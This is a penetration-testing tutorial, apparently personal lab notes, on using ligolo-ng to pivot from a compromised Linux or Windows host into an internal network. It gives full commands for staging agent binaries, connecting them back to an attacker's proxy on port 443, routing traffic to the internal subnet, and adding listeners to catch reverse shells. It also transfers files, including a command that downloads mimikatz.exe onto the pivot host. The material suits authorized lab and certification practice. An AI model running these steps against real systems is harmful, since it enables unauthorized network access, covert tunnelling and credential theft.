ligolo-ng for pivoting, Reverse shell and file transfer

Ligolo-ng — Pivoting, Reverse Shells and File TransfersMedium

ligolo-ng Set Up

Go to the GitHub page and Download File.

We will be using a proxy file for our attacking machine (in our case, it is Kali Linux) and an agent file for a compromised host that is Linux or windows. (Take care of the architect of the machine).

Download it for Kali Linux machine and compromised host.

# Please verify the architect.
# Then download the file.

# Command for Linux:
uname -m
arch
lscpu | grep Architecture

# Command for windows:
wmic os get osarchitecture
systeminfo | findstr /C:"System Type"

Make directory

mkdir -p tunnelling ; cd tunnelling

# download the file:
# Below is for a Compromised host and this is called as agent.
# If there is a window host (victim)
# wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.2-alpha/ligolo-ng_agent_0.7.2-alpha_windows_amd64.zip
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip

# If there is linux host (Victim)
# wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.2-alpha/ligolo-ng_agent_0.7.2-alpha_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_linux_amd64.tar.gz

# Below is for kali Linux:
# wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.2-alpha/ligolo-ng_proxy_0.7.2-alpha_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz


# Extract the file using the below command:
find . -name "*.tar.gz" -exec tar -xzf {} \;
find . -name "*.zip" -exec unzip -o {} \;

# Listing the content.
ls -la

# Transfer the agent file to the compromised host.
python3 -m http.server 8000 &

Creating an interface for proxy server:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up

The above command is copied from the repo git wiki. [Click here to view it]

Running proxy file

Running proxy file in Kali Linux. [Click here to view it].

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
$ ./proxy -selfcert # Use self-signed certificates

# I will be using selfcert in Kali Linux
sudo ./proxy -selfcert
sudo ./proxy -selfcert -laddr 0.0.0.0:8090 # with custom port
# Using Sudo will allow us to use auto route functionality.

sudo ./proxy -selfcert -laddr 0.0.0.0:443 # This port is mostly open

Connecting to proxy server from compromised host

Don't forget to give execute permission to the file.

./agent -connect 192.168.45.152:8090 -ignore-cert

./agent.exe -connect 192.168.45.152:11601 -ignore-cert

We will see msg like shown below for a successful connection.

ligolo-ng » INFO[0212] Agent joined.                                 name=confluence@confluence01 remote="192.168.216.63:43416"

Listing the active sessions

Using session as command we can list the session and then give session number to connect to that session.

Setting up forwarding Automatically

This is available in Ligolo-ng 0.7.3. For other versions need to add manually.

find out the internal network you want to visit.

[Agent : confluence@confluence01] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ ens192                         │
│ Hardware MAC │ 00:50:56:ab:6d:17              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.216.63/24              │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 2                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ ens224                         │
│ Hardware MAC │ 00:50:56:ab:dc:9b              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 10.4.216.63/24                 │ --> Visit this !!
└──────────────┴────────────────────────────────┘

Add this to the routing table from the Kali Linux terminal.

sudo ip route add 10.4.216.0/24 dev ligolo

You can also use autoroute command if you started proxy with sudo permission.

autoroute

Got to the session of ligolo and type start to start the tunnelling.

start

Setting up forwarding Manually

# Go to the session established.
session 1

# list the interface.
ifconfig

# Run adding route command in another terminal of kali linux.
sudo ip route add 10.4.216.0/24 dev ligolo

# Then run start in ligolo agent.
start

Verify the connection.

You can use a tool like netexec or try ping (Pinging may not always work !!).

Best way is to run nmap command to verify. 😂

nmap 10.4.216.215

Suppose you want to access ssh 🤔. You can simply do this using the ssh command.

# Example
ssh  [email protected]

Adding Listener

Ligolo-ng — Pivoting, Reverse Shells and File TransfersMedium

For reverse shell

If you want to catch the reverse shell then it is highly advisable to add Listener.

Way to do that. Run the below command in the agent session.

listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443

When setting up a reverse shell using a PowerShell Base64-encoded payload, ensure that the IP address used is the local IP address of the machine through which you are tunneling. To identify the correct local IP address, run a network enumeration tool or command (e.g., netstat, ipconfig, ifconfig, or netexec) on the tunneling machine to verify the IP address you need to use. Replace the placeholder with the identified local IP address in the payload.

In my case, Tunneling machine is MS01. and it's local IP is 10.10.x.147

For File transfer:

Add a listener for the transfer of a file.

listener_add --addr 0.0.0.0:1235 --to 127.0.0.1:8000

Start the server in the directory where the file to be transferred is located.

python3 -m http.server 8000 -d # In kali Linux.

You can run the below command to download the file. Please Take care of the IP address you are using.

#Invoke-WebRequest -Uri "http://Local_ip_of agent[MS01]:1235/agent.exe" -OutFile agent.exe
Invoke-WebRequest -Uri "http://10.10.189.147:1235/mimikatz.exe" -OutFile mimikatz.exe

PreviousChecking Shell type NextWeb Scanning Tools

Last updated 1 year ago

hashtagligolo-ng Set Up

hashtagCreating an interface for proxy server:

hashtagRunning proxy file

hashtagConnecting to proxy server from compromised host

hashtagListing the active sessions

hashtagSetting up forwarding Automatically

hashtagSetting up forwarding Manually

hashtagVerify the connection.

hashtagAdding Listener

hashtagFor reverse shell

hashtagFor File transfer: